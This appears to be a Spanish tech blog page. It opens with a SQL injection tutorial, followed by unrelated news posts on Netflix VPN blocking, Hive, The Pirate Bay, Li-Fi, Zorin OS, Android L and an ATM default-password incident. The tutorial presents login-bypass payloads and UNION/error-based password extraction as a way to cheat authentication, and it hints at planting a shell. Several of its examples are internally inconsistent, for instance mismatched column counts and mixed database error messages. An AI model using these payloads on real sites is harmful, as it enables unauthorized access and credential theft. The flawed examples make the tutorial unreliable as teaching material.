Publicado el

Tutorial SQL Injection ¿Como se Hace?

La inyección SQL es el ataque vía web, que aprovecha errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.

Atención

Es recomendable tener un poco de conocimiento en PHP para  el mejor entendimiento de los  Códigos.

Los ataques SQL pueden ser evitados de muchas formas, iniciare con algunos ejemplos de instrucciones vulnerables, con las “magic quotes” desactivadas.

Ejemplo 1

Código:
$us=$_POST[‘usuario’];
$pass=$_POST[‘pass’];
$sql=”SELECT * FROM usuarios WHERE user = ‘$us’ AND password=’$pass'”;
Código:
if(mysql_fetch_array($exc)){
echo “Inicio de sesión correcto”; // Esto fue modificado
}
Este es el tipico sistema de verificación de contraseñas. Utiliza la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso si no hay ningún resultado, en la ‘querry’, o petición), asi que si no hay ningún resultado donde el usuario y el password conuerden, el resultado es false.

como podemos hacer que no devuelva false??

  • Con el password correcto
  • Haciendo trampa

En este caso como no conocemos el password correcto  usaremos la segunda opción:

Haciendo trampa.. se haría algo así:

esta es la petición que solo nos deja pasar si sabemos el password:
Código
SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'ahora, ¿como se puede hacer que nos devuelva true aunque no sepamos el password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario betito, y de password pass1234.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibirá seria :

Código:
SELECT * FROM usuarios WHERE user = 'betito' AND password='pass1234'
Como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false.
Ahora, con un poco de creatividad:
de usuario:   betito
de password: ‘ OR ”=’la sentencia SQL recibira:

SELECT * FROM usuarios WHERE user = 'betito' AND password='' OR ''=''

nos devolvera true, si hay algun resultado y como NADA siempre es igual a NADA, nos devolvera true, y pasamos el mecanismo de validación como el usuario betito.

Otros posibles valores que devuelven true son:

  • usuario: betito AND /*   password: */ ”=’
  • usuario: ‘ OR 1=1 //

Ahora… que si quisieras saber el password.. (te advierto, que normalmente esta cifrado, y deberas desencriptarlo, con alguna herramienta para eso como john the ripper), tomemos el siguiente ejemplo.

Ejemplo 2
Código:
$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET[‘usuario’] || $_GET[‘pass’]){
die(“Hack Attempt”);
}
$sql=”SELECT password FROM usuarios WHERE user = ‘$us'”;
Código:
$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo “Inicio de sesión exitoso”; // Esto fue modificado
}else{
echo “el password $resp es incorrecto”;
}
}
 Bien, este ejemplo, que se ve mucho mas seguro  y surge la pregunta , ¿es vulnerable?
SI, ¿porque?
Ya quedamos en que no hay magic quotes, las magic quotes son una función que trata de desactivar todas las cadenas introducidas por el usuario, que parezcan peligrosas, como comillas, diagonales, \0 etc..
el webmaster pensó, que como no usaba el mysql_fetch_array, entonces no podian usar un ‘ OR ”=’, como la inyección clasica, pasada.Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

  • Necesitas meter la misma cantidad de valores que tiene la tabla.
  • Tener un informe de los errores que provocaremos en la instrucción

Bien ahora empezemos.
la instrucción a modificar es la siguiente:

Còdigo:
SELECT password FROM usuarios WHERE user = '$us'como ejemplo, si colocamos de usuario: maestro
la instrucción que llega seria:

 

Código:
SELECT password FROM usuarios WHERE user = 'maestro'

regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ‘ AND 0 UNION SELECT 1 AND ‘l’=’
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:

Código Regreso:
The used SELECT statements have a different number of columns:SELECT password FROM usuarios WHERE user = ” AND 0 UNION SELECT 1 AND ‘l’=”

Continuando por el mismo camino, podemos hacer que nos regrese un error, al tratar de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda letras)

Quedaria algo así:

‘ UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = ‘maestro’

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'maestro'

que nos da como error:

Codigo
Syntax error converting the varchar value ‘12345’ to a column of data type int.

donde el password es 12345

Las inyecciones ultimamente han logrado tener mas poder que antes,  debemos sacar toda la información posible, y con un poco de esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).el siguiente es un ejemplo, con la misma sentencia usuario:

Código:

‘ AND 0 UNION SELECT 1,user(),3,4,5 AND ‘l’=’

y nos regresa:

Código Respuesta:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ‘UNION’

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

‘ AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND ”l=’

y eso nos regresa:

Código Shell:
root@localhost
esto, no es todo, con hacer que regrese valores con ‘<??>’, podemos incluso crearnos nuestra shell.
Bueno amigos esto fue todo el tutorial esperando sus comentarios .
Nos vemos en el siguiente Tutorial.
Publicado el

Netflix Bloqueara el Uso de VPN y Proxys.

netflix-television

Los servicios de streaming como Netflix son siempre más variados en Estados Unidos, por ello, muchos de nosotros utilizamos un pequeño truco con el cual podemos ingresar al catálogo de ese país, pues bien, parece ser que la compañía lo ha hecho de nuevo (la primera fue su cambio de costos) y aparentemente ha comenzado a bloquear proxys o VPN.

Con los proxys y VPN podíamos hacer pensar a nuestra computadora que estábamos en otra parte del mundo, pues a Netflix no le ha gustado nada y lo ha comenzado a bloquear, por ejemplo, en la aplicación de Android solamente puede acceder con un proxy de Google, lo cual inhabilita cualquier modificación.

descargaPor otro lado, usuarios de TorGuard han informado a TorrentFreak que varios de ellos han sido bloqueados al usar uno de esos trucos, pero que ciertamente se trata de casos aislado como para mencionar de una redada o implementación masiva.

 

Lo que sabemos por ahora es que posiblemente Netflix utiliza el navegador de tu computadora o el GPS de tu smartphone o tablet para establecer el huso horario que tienes y así verificar el lugar de donde estás visualizando el contenido, esperemos que pronto se anuncie por lo menos que se está bloqueando o sino, que simplemente dejen las cosas como están.

Publicado el

Hive la nueva alternativa para almacenar sin limites en la Nube

Hive permite subir diversos tipos de archivos sin cobrar, convirtiéndose en rival para servicios como Dropbox y Box. Tiene además funciones de red social, se puede escuchar música y ofrece acceso a cuentas premium a quienes tengan más de 100 amigos.

0011678317 0011678324Tras un breve período de pruebas limitadas, Hive abrió finalmente su servicio a los usuarios para que suban diversos tipos de archivos, sin límites de almacenamiento ni costos. 

Hive solo cobra por pocas funciones premium, como la visualización de videos en HD y la desaparición de anuncios publicitarios. Después, dicen sus creadores, el usuario podrá subir videos de incluso 4 TB.

A diferencia de Dropbox, Box, Google Drive y SkyDrive, entre otros, Hive suma funciones sociales: se pueden agregar amigos y ver, si así lo deciden, sus fotos, videos u otros archivos. Incluso, como cuenta con un reproductor multimedia, los usuarios son capaces de escuchar la música que otros almacenan.

0011678310Hive aún está en etapa de pruebas, por lo que su servicio puede mostrarse inestable. A cambio, sus creadores proponen acceso a funciones premium sin costo. 
Cuando la beta finalice, el costo del servicio premium será de u$s9 mensuales si el usuario tiene menos de 10 amigos; de u$s6 en caso de tener más de 10; ascenderá a u$s3 para aquellos con más de 50; y será gratuito para quienes superen los 100 contactos.

Hive es ofrecido por la firma QVIVO, basada en Hong Kong y dedicada a ofrecer almacenamiento en la nube. En una entrevista con TorrentFreak, los creadores explicaron que un servicio se diferencia del otro por su parte social.

Publicado el

Así es como Funciona The Pirate Bay por dentro

black_and_white_the_pirate_bay_flags_1366x768_28278

En 2006, la policía irrumpía en el proveedor de alojamiento del popular tracker de BitTorrent The Pirate Bay y confiscaba todos los servidores. Pese a todo la página siguió funcionando y, con vistas a evitar una situación similar en el futuro, en 2012 los responsables de la misma aseguraron que TPB ya no tendría servidores que requisar: su lugar estaría, desde entonces, en la nube.

Ahora, dos años después, desde Torrent Freak publican más detalles sobre la estructura interna que utiliza el tracker. Sabemos, por ejemplo, que en la actualidad el sitio funciona sobre 21 máquinas virtuales contratados por todo el mundo y no tienen hardware propio (específicamente servidores). En total todas ellas suman 182 GB de RAM, 94 CPU y 620 GB de espacio, aunque dicen no utilizarlo al completo.

¿Para qué se utilizan estas máquinas virtuales? No todas están destinadas a la misma tarea, como vemos a continuación y además la distribución no es fija. Por ejemplo, y debido al crecimiento reciente de actividad, han tenido que añadir cuatro nuevas máquinas en los dos últimos años. La distribución actual sería la siguiente:

 

  • 8 sirven la página web
  • 6 para búsquedas
  • 2 para la base de datos
  • 1 para torrents
  • 1 para estadísticas
  • 1 para el proxy
  • 1 para balancear la carga
  • 1 para control

Como pasan desapercibido

 

Tal y como explicábamos ya en 2012, la idea de utilizar esta configuración es conseguir hacer más difícil el acceso a las autoridades. Ya no hay una sala de servidores en la que irrumpir, como en 2006, sino que son máquinas dispersas por todo el mundo. Todo el trabajo de éstas pasa por el balanceador de carga, por lo que es imposible saber cuál es el origen del tráfico que se recibe (en otras palabras, el tráfico entre balanceador y máquina virtual va cifrado y de cara al resto del mundo el origen es el propio balanceador).

Lo más curioso de todo es que, por lo que acabamos de explicar, las máquinas virtuales proceden deservicios comerciales de alojamiento en la nube que ni siquiera saben que The Pirate Bay está entre sus clientes. ¿Y si se pierde una máquina virtual? Todo está preparado para tener otra funcionando casi de forma instantánea, por lo que de cara al usuario final no se interrumpiría el servicio. Siendo todavía más “apocalípticos”, y en el improbable caso de que las autoridades consiguieran entrar el sistema actual, bastaría con desconectar las máquinas virtuales, mudar su contenido a otro proveedor y apuntar hacia él el balanceador de carga.

¿Significa todo esto que The Pirate Bay está listo para resistir cualquier movimiento de las autoridades? Sí y no. De momento, y con esta configuración de su tracker, han conseguido sobrevivir. Sin embargo, dentro de la cadena hay algunos servicios más frágiles, como los dominios (no será la primera vez que les suspenden alguno). Eso sí, en el caso de que vuelvan a perder su dirección, tienen preparadas decenas de ellas para actuar como alternativas. Con todo esto, no se pueden decir que los chicos de TPB no estén preparados para la que les pueda caer.

Publicado el

México El primer país en Latino América que contara con Red LI-FI

lifi-1

El sistema de transmisión de datos inalámbrico por medio de leds, rápido y de bajo costo llegara a México en octubre.

Desde el año pasado comentamos noticias relacionadas con la tecnología Li-Fi, es decir, una manera barata de transmitir información a través de la luz, por medio de leds, y no con ondas de radio. Los led funcionan mediante ciclos de encendido y apagado, generando un flujo sencillo de datos y de baja velocidad. Sin embargo, al combinarse con varios leds, transmiten miles de señales a alta velocidad.

A pesar de ser una manera de transmitir datos muy reciente y novedosa, incluso aun en periodo de desarrollo, los primeros productos que funcionan gracias a ella ya se han puesto a la venta en otras partes del mundo, como China o Inglaterra. Ahora, gracias a la compañía de desarrollo de software Sisoft, llegará a México la tecnología Li-Fi, que busca competir con el Wi-Fi en todas las formas posibles aprovechándose de la rapidez y bajo costo de esta nueva forma de transmisión de información.

El servicio inicial, que se conocerá como InternetLedCom, ofrecerá velocidades de conexión de hasta 10 gigabytes por segundo. Junto con el servicio, se pondrán a la venta diferentes dispositivos compatibles con Li-Fi en el primer trimestre de 2015, tanto kits  de leds para el hogar, como dispositivos especialmente diseñados para las empresas y hospitales.

Sisoft, anunció que el primer producto que se pondrá a la venta en octubre de este año serán los audífonos SoundLedCom, los cuales son compatibles con la tecnología Li-Fi y permiten transmitir el audio en tiempo real de forma inalámbrica y sin interrupción de acuerdo al número de leds que se encuentren en el lugar donde se usen.

De acuerdo con especialistas, se espera que para el año 2018 la tecnología Li-Fi genere ventas por valor de 6.000 millones de dólares. Por el momento, México se coloca como uno de los países pioneros en este sector tecnológico.

images

Publicado el

Zorin OS, la Distro perfecta para los que quieren cambiar a Linux

photo

Zorin OS es una distribución GNU/Linux multifuncional basada en Ubuntu, puede ser la distribución perfecta para que a los novatos les resulte más fáci el cambio de Windows a Linux.

Esta distribución intenta brindarle al usuario desde el primer momento una interfaz gráfica similar a los sistemas Windows, ofrece una serie de pequeñas herramientas propias las cuales simplifican algunas configuraciones relacionadas, como por ejemplo, con la interfaz gráfica y/o elección del software.

Zorin OS cuenta con un programa de cambiador de mirada única (Look Changer) que han creado exclusivamente para Zorin OS. Permite a los usuarios cambiar la interfaz de usuario con sólo pulsar un botón. Otros programas únicos que incluye son Splash Screen Manager, Internet Browser Manager y Background Plus.

Zorin OS proporciona a los usuarios una mayor flexibilidad. Esto le permite utilizar Zorin OS junto con su sistema operativo actual y ejecutar programas de Microsoft Windows en Zorin OS con la ayuda de WINE y PlayOnLinux.

El Look Changer le permite cambiar su escritorio para lucir y actuar como sea Windows 7, XP, Vista, Ubuntu Unidad, Mac OS X o GNOME 2 para la máxima facilidad de uso.

Screenshot from 2012-06-14 00-12-09

Con Zorin OS puede estar seguro de estar tranquilo.

Requisitos mínimos del sistema:

  • Procesador de 700Mhz.
  • 376MB de memoria RAM.
  • 3GB de Disco duro.

Ahora ya no tienes excusa para no pasarte a Linux ya que con esta distribución lo tienes muchísimo más fácil que con cualquier otra.

Publicado el

Android L, el revolucionario sistema operativo móvil de Google.

Hace ya algunas semanas, que la compañía estadounidense Google mostró al mundo los detalles del sistema operativo que sus usuarios llevaban mucho tiempo esperando. Android L fue presentado como una nueva actualización de Android destinada a cambiar de manera bastante notable el aspecto convencional de la interfaz de los dispositivos que actualmente están actualizados a Android 4.4.2 KitKat.

Dejando a un lado todos los detalles que ya se conocen sobre el nuevo sistema operativo de Google, en esta ocasión vamos a ver los detalles más curiosos sobre la que será la próxima actualización de los de Mountain View que llegará durante los próximos meses. ¿Nos acompañas?

 

curiosidades-android-l-11

 

Cinco detalles curiosos del nuevo Android L

 

1. Android L es la primera actualización en la que Google se ha dedicado a publicar una versión previa para desarrolladores meses antes de que se produzca la publicación de la versión final. De hecho, esta versión puede ser descargada por cualquiera sin que necesariamente tenga que ser desarrollador (siempre con sus riesgos).

2. Uno de los detalles más llamativos de Android L es la ausencia del nombre de algún postre que hasta este momento había estado acompañando a las últimas versiones de Android. Con Android 4.3 conocimos Jelly Bean, mientras que con Android 4.4.2 nos encontramos con KitKat; en el caso del próximo Android L, estamos ante la primera actualización de la historia de Android que llega sin ningún nombre de postre. ¿Estarán a dieta?

3. El nuevo sistema no se caracteriza solamente por no tener nombre de postre, sino que además tampoco dispone de un número de versión concreto. Así que, no sabemos si Android L corresponde a Android 4.5 o a Android 5.0, por lo que otra de las peculiaridades de esta actualización es la ausencia de una numeración que si acompañaba a todas las demás versiones de este sistema operativo móvil.

curiosidades-android-l-1-2

4. La actualización de Android L ha supuesto el primer cambio importante en la interfaz de Android desde que se publicara la versión de Android 4.0 Ice Cream Sandwich. Esto quiere decir, que los usuarios llevaban con la misma interfaz en sus dispositivos tres años.

5. Un detalle que solamente habrá llamado la atención de los más aficionados a la tecnología es que Android L es la primera versión del sistema operativo Android que funciona bajo 64 bits, dejando a un lado los 32 bits sobre los que hasta ahora se había fundamentado el sistema operativo móvil de Google.

curiosidades-android-l-1-3

 

Android L, mucho más que una simple actualización

Tal y como dicen los chicos de tuexpertomovil, Android L es mucho más que una simple actualización, es una versión de Android que puede marcar el comienzo de una nueva era dentro del mercado de los smartphones. Se espera que la actualización comience a publicarse para todo el público de manera oficial en los próximos meses, por lo que los smartphones o tablets que vayan a ser presentados a partir del próximo año 2015 deberían incorporar esta versión de fábrica.

Tendremos que esperar para ver cual será el recibimiento por parte de los usuarios del nuevo sistema operativo móvil de Google. Será en ese momento cuando veremos realmente si Android L será capaz de cumplir con todas las expectativas que de momento está levantando. Y tú, ¿crees que el nuevo Android L dará a los usuarios todo lo que se espera de el? Déjanos tu opinión en los comentarios de abajo, nos gustará saber que piensas.

Publicado el

Geeks del Reino unido lanzan Iphone al Espacio

Earth-tierra-espacio-space

No es la primera ocasión que alguien lanza un iPhone al espacio, en una ocasión ya lo había hecho la misma NASA, pero en esta ocasión fueron unos estudiantes del Giles Academy en Boston, Reino Unido, quienes decidieron recaudar fondos para poder lograr esta excelente hazaña.

Fueron dos años los que se dedicaron a recaudar fondos y por fin consiguieron los recursos necesarios para lograrlo. ¿Qué es lo que utilizaron? Utilizaron unglobo aeroestático de Helio, un GPS para poder encontrar el iPhone después de la caída y una grabadora de altitud todo ello claro está unido al iPhone. El vídeo en cuestión lo podemos ver a continuación:


El globo alcanzó los 29 kilómetros de altitud y logró estar en el espacio durante dos horas y media, cabe mencionar que a su regreso el iPhone fue encontrado a 80 kilómetros del punto de lanzamiento y en excelentes condiciones.

Por supuesto que todos los alumnos y profesores quedaron satisfechos con el resultado. ¿Qué será lo siguiente que sean capaces de hacer los fanáticos?



Publicado el

Ahora Hackear Cajeros es Cosa de Niños

La seguridad es algo que aún muchas personas no se toman en serio, por ello hemos visto capítulos que van desde cuentas hackeadas en redes sociales, correos electrónicos, hasta accesos no autorizados a bases de datos. Pero cuando dos adolescentes de 14 años logran saltar la seguridad de un cajero automático entonces el asunto se pone serio, lo peor de todo es que el hackeo vino gracias a que el cajero contaba con la contraseña por defecto.

Dos jóvenes de la ciudad de Winnipeg en Canadá libraron la seguridad de un cajero automático del Banco de Montreal después de que encontraron un manual de operación, lo curioso de todo es que no se trata de hackers profesionales, si no de dos entusiastas que quisieron probar con una de las contraseñas de administrador que venían por defecto en dicho manual.

La sorpresa fue cuando se percataron que la primer contraseña que probaron les dio acceso a la configuración del cajero e información de cuánto dinero había, cuántas operaciones llevaba realizadas en el día, en fin, todo respecto a la operación del dispositivo. Por lo que de inmediato imprimieron la información para dar aviso a la gerencia del centro comercial.

650_1000_hack_atm

Por fortuna, no se trataba de jóvenes criminales y sólo decidieron cambiaron el mensaje de bienvenida por “Aléjate. Este cajero automático ha sido hackeado” para así informar a los clientes que el cajero se encontraba fuera de servicio. Posteriormente el Banco de Montreal confirmó el hecho, pero no dio más declaraciones del incidente.

Es sorprendente lo vulnerables que pueden ser este tipo de dispositivos, y más si la gente que los configura no está consciente de la importancia de una contraseña segura. Esperemos no haya casos similares en alguna parte del mundo ahora que sabemos que algunos cajeros automáticos cuentan con la contraseña por defecto indicada en el manual.

Publicado el

Haz tu Android más rápido con este sencillo ajuste.

Una de las grandes maravillas del sistema operativo Android es la facilidad que le da a cualquier tipo de usuario para personalizar su dispositivo, mucho más allá de simplemente cambiar el fondo de pantalla o el tono de llamadas. Android se puede modificar por completo fácilmente, lo cual es algo genial para muchos, pero también peligroso sino tienes el conocimiento (o la paciencia) necesario para esta tarea.

Aún así, además de cambiar iconos y animaciones, launchers y notificaciones, Android permite, de cierta forma, mejorar o pulir su rendimiento. Desde BGR nos enseñan un pequeño truco basado en los ajustes escondidos del sistema, que tendremos que encontrar para poder modificar.

Lo primero que debemos hacer es encontrar el apartado de Opciones de programador en el dispositivo Android que utilicemos. Estas opciones están escondidas por razones obvias, pero se pueden aprovechar para mejorar algunas cosas. La idea es tener un Android más rápido, y realizando ajustes en las animaciones lo podremos lograr fácilmente.

En el caso de un dispositivo Nexus, por ejemplo, las opciones de programador están escondidas en el menú de ajustes del móvil, luego en el apartado de “Acerca del dispositivo”, bajar hasta que encontremos en la información el “Número de compilación”. Esto no es un botón, pero si lo presionamos siete veces se activará el modo de programación. Luego de esto, salimos de este apartado hasta el menú inicial de ajustes y encontraremos el acceso al apartado de Opciones de Programador.

 

opciones-programador

 

Les recomiendo completamente no tocar ni cambiar absolutamente nada, además de lo que en este mini-tutorial incido; estas son opciones delicadas del móvil, recuérdenlo. Una vez en este apartado bajamos hasta encontrar una sección llamada “Dibujo” y allí, modificaremos los valores en tres opciones:

  • Ventana de escala de animación
  • Transición de escala de animación
  • Escala de duración de animador

Por defecto, el valor en estas opciones será de “1x”, pero podemos disminuirlos hasta “.5x” (todos por igual) y luego reiniciar el móvil. Esto hará que las animaciones del sistema sean más ligeras, y por ende tendremos un Android más rápido, siguiendo apenas estos sencillos pasos.

Haz la prueba, y notarás la diferencia. Incluso la batería de tu dispositivo durará más.